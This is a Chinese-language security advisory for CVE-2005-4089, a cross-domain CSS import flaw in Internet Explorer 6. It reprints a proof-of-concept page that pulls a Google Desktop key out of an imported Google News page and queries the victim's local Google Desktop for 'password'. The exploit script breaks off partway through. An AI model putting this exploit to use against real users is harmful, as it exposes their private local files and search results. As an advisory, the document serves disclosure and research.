Microsoft Internet Explorer CSS导入跨域限制绕…

发布日期：2005-12-01
更新日期：2006-06-13

受影响系统：

Microsoft Internet Explorer 6.0 SP2
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0

描述：

---

BUGTRAQ ID: 15660
CVE(CAN) ID: CVE-2005-4089

Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。

Internet Explorer在处理CSS文件时存在漏洞，远程攻击者可能利用此漏洞获取用户敏感信息。

Internet Explorer不能正确的解析CSS文件，导致可能导入无效的CSS文件。这样用户就可能错误的将远程站点的HTML和脚本代码做为CSS文件导入，允许攻击者读取敏感信息。

<*来源：Matan Gillon （matan@hacker.co.il）

链接：http://www.hacker.co.il/security/ie/css_import.html
http://secunia.com/advisories/17564/print/
http://www.microsoft.com/technet/security/Bulletin/MS06-021.mspx
http://www.us-cert.gov/cas/techalerts/TA06-164A.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<head>

<!--
Google Desktop Exploit proof of concept by Matan Gillon

This page is a proof of concept for the CSSXSS attack discussed
at:
http://www.hacker.co.il/security/ie/css_import.html

It shows how using a few simple CSS imports an attacker can
run queries and return the results on a machine that has Google Desktop
v2 installed. This exploit runs only on IE or IE derived browsers.

This is how it's done in a nutshell:
1) Import the google news page as CSS with the query "}{".
2) Extract the GDS key from the import results using a regular expression.
3) Run another CSS import that executes a query for the word "password"
on the local GDS server.
4) Wait 5 seconds for the page to load and show the result.

This proof of concept code is supplied for educational purposes only.
-->

<title>hacker.co.il - Google Desktop Exploit</title>

<style type="text/css">
/*
Import the google news page, the GDS link with the secret key should be
retrieved by this. The query injects curly braces characters so the
link will be visible after the IE CSS parsing.
*/

@import url("http://news.google.com/news?hl=en&ned=us&q=}{");

</style>

</head>

<body>

<h2>Google Desktop Exploit proof of concept</h2>

<p>
Mangled HTML code returned from Google News by a CSS import (note the 127.0.0.1 desktop link):<br>
<textarea rows="20" cols="80" id="gnewsssrc"></textarea>

<p>
Google Desktop key parsed from the code above:<br>

<input type="text" size="50" id="gdskey">

<p>
Results returned from local Google Desktop for the word "password" in raw HTML after CSS parsing:<br>
<textarea rows="20" cols="80" id="gdsresult">Please wait while getting results</textarea>

<p>
The original Google Desktop result page from the local machine:<br>

<iframe width="620" height="300" id="gdspage"></iframe>

<p>
<a href="http://www.hacker.co.il/security/ie/css_import.html">Back to article at hacker.co.il</a>

<script>

// This will show the results of the query on google desktop
function showResults()
{
document.getElementById("gdsresult").innerText = document.styleSheets(0).imports(1).cssText;
}

// Show the CSS parsed HTML source of the Google News import
document.getElementById("gnewsssrc").innerText = document.styleSheets(0).imports(0).cssText;

// A regular expression that parses the key out of the CSS import result
var re = new RegExp("127.0.0.1:4664/search&s=(. ?)\?q");
var reRes = re.exec(document.styleSheets(0).imports(0).cssText);

if (reRes)
{
// Show the parsed key
document.getElementById("gdskey").innerText = reRes[1];

// Combine the valid key with the local server address and add a password query to the URL

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有